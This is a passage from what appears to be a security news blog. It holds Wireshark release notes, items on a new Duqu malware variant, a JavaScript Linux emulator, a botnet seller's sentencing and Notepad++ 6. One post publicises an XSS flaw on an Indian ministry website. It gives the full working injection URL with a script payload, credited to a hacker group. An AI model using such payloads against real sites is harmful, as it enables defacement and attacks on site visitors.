  • Fixed compilation of dumpcap on some systems (when MUST_DO_SELECT is defined). (Bug 6614)
  • SIGSEGV in SVN 40046. (Bug 6634)
  • Wireshark dissects TCP option 25 as an “April 1” option. (Bug 6643)
  • ZigBee ZCL Dissector reports invalid status. (Bug 6649)
  • ICMPv6 DNSSL option malformed on padding. (Bug 6660)
  • Wrong tvb_get_bits function call in packet-csn1.c. (Bug 6708)
  • [UDP] – Length Field of Pseudo Header while computing CheckSum is not correct. (Bug 6711)
  • pcapio.c: bug in libpcap_write_interface_description_block. (Bug 6719)
  • Memory leaks in various dissectors.
  • Bytes highlighted in wrong Byte pane when field selected in Details pane.

Updated Protocol Support:-
BGP, BMC, CSN1, DCERPC EPM, DCP(ETSI), DMP, DTLS, GSM Management, H245, HPTEAM, ICMPv6, IEEE 802.15.4, IPSEC, IPv4, IPv6, ISAKMP, KERBEROS, LDSS, NFS, RLC, RPC-NETLOGON, RRC, RTMPT, SIGCOMP, SSL, SYSLOG, TCP, UDP, XML, ZigBee ZCL

New and Updated Capture File Support:-
Accellent 5Views, AIX iptrace, HP-UX nettl, I4B, Microsoft Network Monitor, Novell LANalyzer, PacketLogger, Pcap-ng, Sniffer, Tektronix K12, WildPackets {Airo,Ether}Peek.



Vulnerability Found By C'seven Outlaw on the Official Website of Ministry of Commerce & Industry (Govt. India)


The official website of the Ministry of Commerce & Industry (Govt. India) is vulnerable to an XSS attack. This vulnerability was found by C'seven Outlaw from the group culpritz_7 hackerz.

Vulnerable Site:-
http://commerce.nic.in/
Vulnerable Link:- 
http://commerce.nic.in/traderemedies/ad_casesinindia.asp?id=2%22%3E%3Cscript%3Ealert%28%22Hacked%20By%20c7%20outlaw%22%29%3C/script%3E



Duqu is Still in Operation, Researcher Found New Duqu Variant


Last month researchers at Kaspersky Lab managed to solve the Duqu mystery. They discovered that this dangerous Stuxnet-like malware was written in a custom object-oriented C dialect called “OO C”. But was that sufficient to stop this dangerous cyber weapon? The answer is a big no: today a new Duqu variant has surfaced, which clearly indicates that the attacks are still ongoing and that security experts have so far failed to put a solid wall between Duqu and cyberspace. The latest Duqu driver was compiled in February 2012, more than four months after Duqu was first flagged as a unique piece of malware with “striking similarities” to Stuxnet, the mysterious computer worm that targeted nuclear facilities in Iran.
Symantec identified the newly compiled Duqu driver as mcd9x86.sys and said it contains no new functionality beyond spying and collecting data from infected machines. Kaspersky Lab’s Costin Raiu says the latest variant has been engineered to escape detection by the open-source Duqu detector toolkit released by CrySyS Lab.


-Source (ZDnet) 



Javascript Emulator runs Linux in a browser





Fabrice Bellard has released a JavaScript program that can run Linux in a Web browser window.
Step aside, Google Docs, there's a new JavaScript tour de force in town.
I'm talking about the latest project from programmer Fabrice Bellard, a JavaScript program that emulates an x86 processor fast enough to run Linux in a Web browser.
The JavaScript PC Emulator can do the work of an Intel 486 chip from the 1990s, but doesn't have a built-in floating point unit for numeric processing, Bellard said. Happily, Linux itself can emulate that, and a version of the operating system's core--2.6.20--runs on the foundation.
Bellard published a technical description of the JavaScript PC Emulator on Saturday, but today the project caught the notice of prominent techies, including Brendan Eich, a Mozilla programmer and the creator of JavaScript.
"I did it for fun, just because newer JavaScript engines are fast enough to do complicated things," Bellard said of the project. "I happen to be interested by the implementation of JavaScript engines these days--but I don't know yet if I will write my own any time soon! Anyway, this emulator was a way to learn how to write optimized code for recent JavaScript engines, in particular JaegerMonkey (for Firefox 4) and V8 (for Chrome)."
Bellard suggests some possibilities for more serious use, including benchmarks or running old DOS games. But probably the project's biggest practical repercussion is simply the news that JavaScript has matured enough to run an entire computer-within-a-computer.
Curious people can try the emulator with a modern browser that has fast JavaScript performance; it works with Firefox 4 but not newer versions of Google Chrome. And those who really want to dig in can look at the JavaScript PC Emulator's actual JavaScript code.
The project is the latest attention-getter from Bellard. The French programmer also wrote QEMU, software that can emulate one type of processor on another; FFmpeg, open-source software for playing and otherwise handling video and audio streams; QEmacs, a lightweight text editor for Unix systems; digital TV signal generator software that uses a computer's VGA card to broadcast TV over the air; Linmodem, Linux software that emulates a hardware modem chip; and a program that calculated pi to a then-record 2,699,999,990,000 digits using a mere personal computer.
Bellard also is a two-time winner of the Obfuscated C competition to produce clever but superficially incomprehensible programs in the C language.



Hacker Sentenced to 30 Months in Prison for Selling Access to Botnets & Infecting 72,000 PCs




A 30-year-old computer hacker received a 30-month prison sentence for creating a botnet and a charge of violating the Computer Fraud and Abuse Act. According to the Department of Justice, Joshua Schichtel, of Phoenix, was sentenced today to 30 months in prison for selling command-and-control access to and use of thousands of malware-infected computers, announced Assistant Attorney General Lanny A. Breuer of the Justice Department’s Criminal Division and U.S. Attorney for the District of Columbia Ronald C. Machen Jr.
Schichtel was sentenced by Chief U.S. District Judge Royce C. Lamberth in the District of Columbia.  In addition to his prison term, Schichtel was ordered to serve three years of supervised release. 
Schichtel entered a guilty plea on Aug. 17, 2011, to one count of attempting to cause damage to multiple computers without authorization by the transmission of programs, codes or commands, a violation of the Computer Fraud and Abuse Act.
According to court documents, Schichtel sold access to “botnets,” which are networks of computers that have been infected with a malicious computer program that allows unauthorized users to control infected computers.  Individuals who wanted to infect computers with various different types of malicious software (malware) would contact Schichtel and pay him to install, or have installed, malware on the computers that comprised those botnets.  Specifically, Schichtel pleaded guilty to causing software to be installed on approximately 72,000 computers on behalf of a customer who paid him $1,500 for use of the botnet.

This case was investigated by the Washington Field Office of the FBI.  The case is being prosecuted by Corbin Weiss, Senior Counsel in the Criminal Division’s Computer Crime and Intellectual Property Section and Special Assistant U.S. Attorney for the District of Columbia.





Notepad++ 6 (Open-Source Text Editor) Released With New Features

One of the most famous and widely used source code editors for Windows, Notepad++, has reached version 6. The tool is written in C++ and supports plugins, macros, and text highlighting for many programming languages including C, C++, C#, Visual Basic, Java, Lua, Python, Perl, SQL, HTML and XML.
Newest Features:-
  • PCRE (Perl Compatible Regular Expressions) is supported.
  • Add Document Map feature (via Menu View->Document Map)
  • Enhance the loading performance for the large file
Included plugins (Unicode):-
  • Spell Checker v1.3.3
  • NppFTP 0.24.1
  • NppExport v0.2.8
  • Plugin Manager 1.0.8
  • Converter 3.0
Note that the Notepad++ Document Map is only available in the Unicode release. The source code for the ANSI release is no longer maintained, so the ANSI binary will be removed in future releases.

